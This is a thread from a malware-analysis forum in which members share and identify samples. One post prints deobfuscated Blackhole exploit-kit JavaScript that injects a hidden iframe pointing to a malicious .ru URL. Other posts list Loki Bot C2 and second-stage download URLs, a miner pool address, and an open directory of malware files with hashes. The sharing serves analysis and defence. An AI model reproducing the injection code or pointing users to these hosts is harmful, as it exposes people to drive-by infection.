Malware collection

Forum for analysis and discussion about malware.

Re: Malware collection

Postby Antelox » Wed Jul 12, 2017 5:43 pm



This is an old infected page by Blackhole EK.

The malicious iframe, after deobfuscation, looks like

Code: Select all
if (document.getElementsByTagName('body')[0]){
    iframer();
} else {
    document.write("<iframe src='http://zihemmi.ru/count26.php' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
}
function iframer(){
    var f = document.createElement('iframe');f.setAttribute('src','http://zihemmi.ru/count26.php');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10');f.setAttribute('height','10');
    document.getElementsByTagName('body')[0].appendChild(f);
}


Code: Select all
http://zihemmi.ru/count26.php


BR,

Antelox
Antelox
 
Posts: 114
Joined: Sun Mar 21, 2010 10:38 pm
Reputation point: 91

Re: Malware collection

Postby ikolor » Thu Jul 13, 2017 11:50 am

You do not have the required permissions to view the files attached to this post.
ikolor
 
Posts: 243
Joined: Thu Jun 05, 2014 2:20 pm
Location: Poland
Reputation point: 16

Re: Malware collection

Postby Antelox » Thu Jul 13, 2017 12:11 pm



Same shit as the one with SHA256: b9e2390f54ebfe328452d8b79d84b0d1869d27ade8c8819f519ad2100bfb46d5

BR,

Antelox
Antelox
 
Posts: 114
Joined: Sun Mar 21, 2010 10:38 pm
Reputation point: 91

Re: Malware collection

Postby ikolor » Thu Jul 13, 2017 2:18 pm

You do not have the required permissions to view the files attached to this post.
ikolor
 
Posts: 243
Joined: Thu Jun 05, 2014 2:20 pm
Location: Poland
Reputation point: 16

Re: Malware collection

Postby Antelox » Thu Jul 13, 2017 3:54 pm



This is a VBS downloader which downloads another VBS from: https://paste.ee/r/zE7Z8/0

The second VBS drops Loki Bot.

C2:

Code: Select all
hxxp://soundblast.club/sound/sound.php


BR,

Antelox
Antelox
 
Posts: 114
Joined: Sun Mar 21, 2010 10:38 pm
Reputation point: 91

Re: Malware collection

Postby ikolor » Thu Jul 13, 2017 7:23 pm

You do not have the required permissions to view the files attached to this post.
ikolor
 
Posts: 243
Joined: Thu Jun 05, 2014 2:20 pm
Location: Poland
Reputation point: 16

Re: Malware collection

Postby xors » Thu Jul 13, 2017 8:55 pm

@xorsthings
User avatar
xors
 
Posts: 132
Joined: Mon May 23, 2016 2:01 am
Location: Greece
Reputation point: 63

Re: Malware collection

Postby Antelox » Thu Jul 13, 2017 10:55 pm

Yep, it's XMRig miner.

ETPRO POLICY XMRig CoinMiner Usage

C2:

Code: Select all
xmr.pool.minergate.com:45560


Email:

Code: Select all
testfilatovmarafon@gmail.com


The Github page of the project: https://github.com/xmrig/xmrig

BR,

Antelox
Antelox
 
Posts: 114
Joined: Sun Mar 21, 2010 10:38 pm
Reputation point: 91

Re: Malware collection

Postby markusg » Fri Jul 14, 2017 7:25 am

open directory.
an exploit and other malware

Code: Select all
http://no2ro.com/17tes.doc
http://no2ro.com/gibsoncrypter.zip
http://no2ro.com/gibtest.exe
http://no2ro.com/kasati.exe
http://no2ro.com/test.hta


SHA256:
0305c67f80b56dc3b27ab2b27348862880bc23517ddce74e87a4a6fdcd2f0b9f
Dateiname:
17tes.doc
Erkennungsrate:
19 / 57
https://www.virustotal.com/de/file/0305 ... 500015953/

i unpacked gibsoncrypter.zip now the results of 2 exe files
SHA256:
18cae9f4f96d356db18924b182843e27e0759ef95422c1156e3588bfd60985a2
Dateiname:
BalloonFastBuilder.exe
Erkennungsrate:
1 / 63
https://www.virustotal.com/de/file/18ca ... 500016117/
SHA256:
454d6d2bc3603106bbdb151cf61ab50bfbe5cc63dc4d9a1da7c899b7c7e6e32a
Dateiname:
stub.exe
Erkennungsrate:
21 / 63
https://www.virustotal.com/de/file/454d ... 500016198/
SHA256:
dc39f1371bbb11f724fb9bb00cbe0a00b83f6cf4dbd6e60ae31bd3d82d383f9a
Dateiname:
gibtest.exe
Erkennungsrate:
17 / 62
https://www.virustotal.com/de/file/dc39 ... 500016401/
SHA256:
339764b340b4c70a02835054993c13d7a2562b8ced06168ae1318ebc0c52680e
Dateiname:
kasati.exe
Erkennungsrate:
28 / 62
https://www.virustotal.com/de/file/3397 ... 500016841/
You do not have the required permissions to view the files attached to this post.
markusg
 
Posts: 713
Joined: Mon Mar 15, 2010 2:53 pm
Reputation point: 141

ffRe: Malware collection

Postby markusg » Fri Jul 14, 2017 7:29 am

You do not have the required permissions to view the files attached to this post.
markusg
 
Posts: 713
Joined: Mon Mar 15, 2010 2:53 pm
Reputation point: 141

PreviousNext

Return to Malware

Who is online

Users browsing this forum: No registered users and 9 guests